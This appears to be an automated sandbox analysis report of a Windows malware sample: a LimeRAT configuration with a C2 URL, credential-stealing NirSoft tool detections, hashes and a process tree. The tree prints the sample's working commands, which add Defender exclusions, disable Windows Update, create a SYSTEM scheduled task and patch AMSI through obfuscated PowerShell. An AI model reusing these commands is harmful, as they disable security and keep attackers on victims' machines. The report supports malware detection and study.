Analysis
-
max time kernel
13s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
06-05-2022 07:02
Static task
static1
Behavioral task
behavioral1
Sample
b1a6bd454f8e723bd8f1b856b336c844.exe
Resource
win7-20220414-en
General
-
Target
b1a6bd454f8e723bd8f1b856b336c844.exe
-
Size
13.4MB
-
MD5
b1a6bd454f8e723bd8f1b856b336c844
-
SHA1
e50b78534ab2761b9f654333f81be3a60f736eb9
-
SHA256
d0fd88199448558df5b8c56936e822aea87f9149c23682004edbf36f28bfb78e
-
SHA512
2bff70684886914c8affa398dda0f801dc22d8f7d0a2a4f2578378f387744c6548779fd2065c7ddde3757d4c3786c40b6006aa1a371ea0b0c1a0ef425ecccd80
Malware Config
Extracted
limerat
-
aes_key
1234
-
antivm
true
-
c2_url
https://pastebin.com/raw/nFP8Nq0E
-
delay
3
-
download_payload
false
-
install
true
-
install_name
whitelistcheck.exe
-
main_folder
AppData
-
pin_spread
false
-
sub_folder
\
-
usb_spread
false
Signatures
-
NirSoft WebBrowserPassView 6 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\n.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\n.exe WebBrowserPassView behavioral2/memory/1520-153-0x0000000000520000-0x00000000009BC000-memory.dmp WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe WebBrowserPassView behavioral2/memory/4448-173-0x0000000000180000-0x00000000005FA000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\n.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\n.exe Nirsoft behavioral2/memory/1520-153-0x0000000000520000-0x00000000009BC000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe Nirsoft behavioral2/memory/4448-173-0x0000000000180000-0x00000000005FA000-memory.dmp Nirsoft -
Executes dropped EXE 1 IoCs
Processes:
New-Client-Test.exepid process 1064 New-Client-Test.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/4540-130-0x0000000000400000-0x0000000001D56000-memory.dmp vmprotect -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
b1a6bd454f8e723bd8f1b856b336c844.exepid process 4540 b1a6bd454f8e723bd8f1b856b336c844.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
b1a6bd454f8e723bd8f1b856b336c844.exepid process 4540 b1a6bd454f8e723bd8f1b856b336c844.exe 4540 b1a6bd454f8e723bd8f1b856b336c844.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
b1a6bd454f8e723bd8f1b856b336c844.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4540 wrote to memory of 4184 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 4184 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 4184 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 608 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 608 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 608 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 2324 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 2324 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 2324 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 3164 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 3164 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 3164 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 2404 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 2404 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 4540 wrote to memory of 2404 4540 b1a6bd454f8e723bd8f1b856b336c844.exe cmd.exe PID 608 wrote to memory of 1064 608 cmd.exe New-Client-Test.exe PID 608 wrote to memory of 1064 608 cmd.exe New-Client-Test.exe PID 608 wrote to memory of 1064 608 cmd.exe New-Client-Test.exe PID 2404 wrote to memory of 1236 2404 cmd.exe menu.exe PID 2404 wrote to memory of 1236 2404 cmd.exe menu.exe PID 2404 wrote to memory of 1236 2404 cmd.exe menu.exe PID 3164 wrote to memory of 1520 3164 cmd.exe n.exe PID 3164 wrote to memory of 1520 3164 cmd.exe n.exe PID 3164 wrote to memory of 1520 3164 cmd.exe n.exe PID 2324 wrote to memory of 1364 2324 cmd.exe protected.exe PID 2324 wrote to memory of 1364 2324 cmd.exe protected.exe PID 4184 wrote to memory of 4492 4184 cmd.exe powershell.exe PID 4184 wrote to memory of 4492 4184 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b1a6bd454f8e723bd8f1b856b336c844.exe"C:\Users\Admin\AppData\Local\Temp\b1a6bd454f8e723bd8f1b856b336c844.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\protected.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\protected.exe"C:\Users\Admin\AppData\Local\Temp\protected.exe"3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\protected.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
-
C:\Windows\system32\sc.exesc stop bits6⤵
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\n.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\n.exe"C:\Users\Admin\AppData\Local\Temp\n.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4PnZTFPlWNL2sBxEj3K0lfm+IpmDl1fWL91EsjtUdV9gePUMFukpx1w8bbbUgxdWL/O2Y/SoYLyHJ0UL+yd4I6Qo2xAsTPBudxn8AP93T31cVHxeQT3kKahuJ43jbU6z8=4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\menu.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\menu.exe"C:\Users\Admin\AppData\Local\Temp\menu.exe"3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8590.tmp\8591.tmp\8592.bat C:\Users\Admin\AppData\Local\Temp\menu.exe"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\menu.exe"5⤵
-
C:\Windows\system32\findstr.exefindstr /b ::: "C:\Users\Admin\AppData\Local\Temp\menu.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EPFTruWUFcDm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IRcvsgzuilNmDP,[Parameter(Position=1)][Type]$uyYTSxAOAF)$bkchzoMBaok=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$bkchzoMBaok.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IRcvsgzuilNmDP).SetImplementationFlags('Runtime,Managed');$bkchzoMBaok.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$uyYTSxAOAF,$IRcvsgzuilNmDP).SetImplementationFlags('Runtime,Managed');Write-Output $bkchzoMBaok.CreateType();}$uaDUVGyusBOue=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$PpzwOIPQqnuHPL=$uaDUVGyusBOue.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KjfZOdHkAEmtMuAsGVz=EPFTruWUFcDm @([String])([IntPtr]);$SMMITyPzTvqaqVcDvSAfJA=EPFTruWUFcDm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fjKKXanmJZW=$uaDUVGyusBOue.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EHGtVIDpwtJAmQ=$PpzwOIPQqnuHPL.Invoke($Null,@([Object]$fjKKXanmJZW,[Object]('Load'+'LibraryA')));$IYtjumAXlndSLJOZT=$PpzwOIPQqnuHPL.Invoke($Null,@([Object]$fjKKXanmJZW,[Object]('Vir'+'tual'+'Pro'+'tect')));$aVJlHUn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EHGtVIDpwtJAmQ,$KjfZOdHkAEmtMuAsGVz).Invoke('a'+'m'+'si.dll');$iVMrDpXVrgiNJHzuT=$PpzwOIPQqnuHPL.Invoke($Null,@([Object]$aVJlHUn,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WBnyungvCC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IYtjumAXlndSLJOZT,$SMMITyPzTvqaqVcDvSAfJA).Invoke($iVMrDpXVrgiNJHzuT,[uint32]8,4,[ref]$WBnyungvCC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iVMrDpXVrgiNJHzuT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IYtjumAXlndSLJOZT,$SMMITyPzTvqaqVcDvSAfJA).Invoke($iVMrDpXVrgiNJHzuT,[uint32]8,0x20,[ref]$WBnyungvCC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:hSIJNVtESMjK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OEzJzvXPepaOIj,[Parameter(Position=1)][Type]$jMjrzFRknb)$XcfqGacJjgA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XcfqGacJjgA.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$OEzJzvXPepaOIj).SetImplementationFlags('Runtime,Managed');$XcfqGacJjgA.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jMjrzFRknb,$OEzJzvXPepaOIj).SetImplementationFlags('Runtime,Managed');Write-Output $XcfqGacJjgA.CreateType();}$JEHwPnEYOSzcB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$YxAvcFUNwQthjT=$JEHwPnEYOSzcB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uAeUqQUBpQaooYHETna=hSIJNVtESMjK @([String])([IntPtr]);$lhCaFjoomvCnqwTNAraVPC=hSIJNVtESMjK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cWRSWBjOZCm=$JEHwPnEYOSzcB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$WAAgBHGkNjgPgd=$YxAvcFUNwQthjT.Invoke($Null,@([Object]$cWRSWBjOZCm,[Object]('Load'+'LibraryA')));$vzpqIFYuIFSuCwGtR=$YxAvcFUNwQthjT.Invoke($Null,@([Object]$cWRSWBjOZCm,[Object]('Vir'+'tual'+'Pro'+'tect')));$YNVQCfC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WAAgBHGkNjgPgd,$uAeUqQUBpQaooYHETna).Invoke('a'+'m'+'si.dll');$EBlTFhkgrlmYKAgtS=$YxAvcFUNwQthjT.Invoke($Null,@([Object]$YNVQCfC,[Object]('Ams'+'iSc'+'an'+'Buffer')));$SMnnScKiMP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vzpqIFYuIFSuCwGtR,$lhCaFjoomvCnqwTNAraVPC).Invoke($EBlTFhkgrlmYKAgtS,[uint32]8,4,[ref]$SMnnScKiMP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$EBlTFhkgrlmYKAgtS,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vzpqIFYuIFSuCwGtR,$lhCaFjoomvCnqwTNAraVPC).Invoke($EBlTFhkgrlmYKAgtS,[uint32]8,0x20,[ref]$SMnnScKiMP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\8590.tmp\8591.tmp\8592.batFilesize
1KB
MD5e1bb09383bc07bceda851a5493b9f56f
SHA1175ffc74d169f99fed6f6296791d7ac48311b3e1
SHA25643994d120fec720a17cb4c5896456346c2a049c1d99be3125249929a76041851
SHA512fa23b11844cb59cd3940fa05d5244e33b84d4a58d98844e221b79bd2e415cd3e70d82515f705bea6ab4cc3930e773930119d0e90b1cd48e2cad0e927f86b305e
-
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exeFilesize
28KB
MD59db028ef92251d3475aa97b3f4b91536
SHA16be1dcadecc2b6f7f071f0812298607e5e1996a0
SHA25603b452e1d1d5a5885a4130370a0418ea65d616f0e2032877c0fb9556c510942f
SHA5120db98918487cb37d86a7b01d40436599c5e08028c244d19b44f990b5a6df1db504cfe26a046c2959c81a485268c9138b9bc37271b41b66f5b281b9a3cf57e31b
-
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exeFilesize
28KB
MD59db028ef92251d3475aa97b3f4b91536
SHA16be1dcadecc2b6f7f071f0812298607e5e1996a0
SHA25603b452e1d1d5a5885a4130370a0418ea65d616f0e2032877c0fb9556c510942f
SHA5120db98918487cb37d86a7b01d40436599c5e08028c244d19b44f990b5a6df1db504cfe26a046c2959c81a485268c9138b9bc37271b41b66f5b281b9a3cf57e31b
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeFilesize
4.4MB
MD53405f654559010ca2ae38d786389f0f1
SHA18ac5552c64dfc3ccf0c678f6f946ee23719cf43d
SHA256bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30
SHA512cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeFilesize
4.4MB
MD53405f654559010ca2ae38d786389f0f1
SHA18ac5552c64dfc3ccf0c678f6f946ee23719cf43d
SHA256bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30
SHA512cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b
-
C:\Users\Admin\AppData\Local\Temp\configFilesize
108B
MD51ba367d0f9aac0f650e65ab7401776c0
SHA175cf3295125cfaa0c247ebccc57e63f915198683
SHA25668c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03
SHA51245ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c
-
C:\Users\Admin\AppData\Local\Temp\menu.exeFilesize
90KB
MD5df1a652f5f40127d986a4ee1742c5f71
SHA11fe492fb25950e47e3b1480820a530b4a60aefe1
SHA2568889ceb7015576ae3c026b39beb8b1dc620ef0c921ad4fc0ea7fd471ca7dc317
SHA512fff5a34e316856bf3ff382a4420d3fa7b84eff0018530893328f7e838d7621e43102b91764f522b6f71986b5931c5e322a8da1ba173d2f8dc5a4ed563b44da8c
-
C:\Users\Admin\AppData\Local\Temp\menu.exeFilesize
90KB
MD5df1a652f5f40127d986a4ee1742c5f71
SHA11fe492fb25950e47e3b1480820a530b4a60aefe1
SHA2568889ceb7015576ae3c026b39beb8b1dc620ef0c921ad4fc0ea7fd471ca7dc317
SHA512fff5a34e316856bf3ff382a4420d3fa7b84eff0018530893328f7e838d7621e43102b91764f522b6f71986b5931c5e322a8da1ba173d2f8dc5a4ed563b44da8c
-
C:\Users\Admin\AppData\Local\Temp\n.exeFilesize
4.6MB
MD5fc2c9d4e84cff08b3b8160b091e72072
SHA10dbb89f0ce90cc26cbff09073949cf1e4b6559d9
SHA2561b09ad4d930bb5f1fb4fca4b2603e33b40884ab32f46a61d71cb57ab2d05e140
SHA51229d164548bc8b189154484d35bc12f8582213196dee71105e1a78ce0e8bfc4e5a483fa2df49b55def044be8c8b4b6685aed096f3d29fa9e51167b4bca2e2ad27
-
C:\Users\Admin\AppData\Local\Temp\n.exeFilesize
4.6MB
MD5fc2c9d4e84cff08b3b8160b091e72072
SHA10dbb89f0ce90cc26cbff09073949cf1e4b6559d9
SHA2561b09ad4d930bb5f1fb4fca4b2603e33b40884ab32f46a61d71cb57ab2d05e140
SHA51229d164548bc8b189154484d35bc12f8582213196dee71105e1a78ce0e8bfc4e5a483fa2df49b55def044be8c8b4b6685aed096f3d29fa9e51167b4bca2e2ad27
-
C:\Users\Admin\AppData\Local\Temp\protected.exeFilesize
4.4MB
MD50514c96bcd5d4fb0cee8865fd32c1ba3
SHA1cd24d7547bb47d87430ab627cca5c8c4acf58971
SHA2569a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489
SHA5122bbaddd521e77783805231d0f0afcc6a802d7140d8d857770f7bcb46cbc88555ac9e39974a4ddb50b685eb7a529de5c006b1d53ec5da708d632fa027c73d143e
-
C:\Users\Admin\AppData\Local\Temp\protected.exeFilesize
4.4MB
MD50514c96bcd5d4fb0cee8865fd32c1ba3
SHA1cd24d7547bb47d87430ab627cca5c8c4acf58971
SHA2569a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489
SHA5122bbaddd521e77783805231d0f0afcc6a802d7140d8d857770f7bcb46cbc88555ac9e39974a4ddb50b685eb7a529de5c006b1d53ec5da708d632fa027c73d143e
-
memory/452-195-0x0000000000000000-mapping.dmp
-
memory/608-133-0x0000000000000000-mapping.dmp
-
memory/1064-152-0x0000000000FF0000-0x0000000000FFC000-memory.dmpFilesize
48KB
-
memory/1064-137-0x0000000000000000-mapping.dmp
-
memory/1064-155-0x0000000005990000-0x0000000005A2C000-memory.dmpFilesize
624KB
-
memory/1096-188-0x0000000000000000-mapping.dmp
-
memory/1236-140-0x0000000000000000-mapping.dmp
-
memory/1364-142-0x0000000000000000-mapping.dmp
-
memory/1372-191-0x0000000000000000-mapping.dmp
-
memory/1520-153-0x0000000000520000-0x00000000009BC000-memory.dmpFilesize
4.6MB
-
memory/1520-141-0x0000000000000000-mapping.dmp
-
memory/1520-160-0x00000000051C0000-0x0000000005226000-memory.dmpFilesize
408KB
-
memory/1520-159-0x0000000005570000-0x0000000005B14000-memory.dmpFilesize
5.6MB
-
memory/1968-201-0x0000000000000000-mapping.dmp
-
memory/2156-168-0x0000025CF5E00000-0x0000025CF5E22000-memory.dmpFilesize
136KB
-
memory/2156-167-0x0000000000000000-mapping.dmp
-
memory/2156-169-0x00007FFB0FB70000-0x00007FFB10631000-memory.dmpFilesize
10.8MB
-
memory/2264-150-0x0000000000000000-mapping.dmp
-
memory/2324-134-0x0000000000000000-mapping.dmp
-
memory/2404-136-0x0000000000000000-mapping.dmp
-
memory/2440-196-0x0000000000000000-mapping.dmp
-
memory/2456-200-0x0000000000000000-mapping.dmp
-
memory/2596-184-0x0000000000000000-mapping.dmp
-
memory/2672-198-0x00007FFB0FB70000-0x00007FFB10631000-memory.dmpFilesize
10.8MB
-
memory/2672-208-0x00007FFB2ECD0000-0x00007FFB2EEC5000-memory.dmpFilesize
2.0MB
-
memory/2720-192-0x0000000000000000-mapping.dmp
-
memory/3164-135-0x0000000000000000-mapping.dmp
-
memory/3220-199-0x0000000000000000-mapping.dmp
-
memory/3256-194-0x0000000000000000-mapping.dmp
-
memory/3560-205-0x0000000000000000-mapping.dmp
-
memory/3600-174-0x0000000000000000-mapping.dmp
-
memory/3652-181-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/3652-182-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/3652-178-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/3652-179-0x0000000140002348-mapping.dmp
-
memory/3652-180-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/3712-186-0x0000000000000000-mapping.dmp
-
memory/3944-176-0x0000000000000000-mapping.dmp
-
memory/4116-157-0x0000000000000000-mapping.dmp
-
memory/4184-132-0x0000000000000000-mapping.dmp
-
memory/4344-156-0x0000000000000000-mapping.dmp
-
memory/4448-170-0x0000000000000000-mapping.dmp
-
memory/4448-175-0x0000000005010000-0x0000000005086000-memory.dmpFilesize
472KB
-
memory/4448-173-0x0000000000180000-0x00000000005FA000-memory.dmpFilesize
4.5MB
-
memory/4492-190-0x00000000077C0000-0x00000000077DA000-memory.dmpFilesize
104KB
-
memory/4492-161-0x0000000005560000-0x0000000005582000-memory.dmpFilesize
136KB
-
memory/4492-189-0x0000000007E00000-0x000000000847A000-memory.dmpFilesize
6.5MB
-
memory/4492-143-0x0000000000000000-mapping.dmp
-
memory/4492-183-0x0000000007680000-0x00000000076B2000-memory.dmpFilesize
200KB
-
memory/4492-207-0x0000000007AF0000-0x0000000007AF8000-memory.dmpFilesize
32KB
-
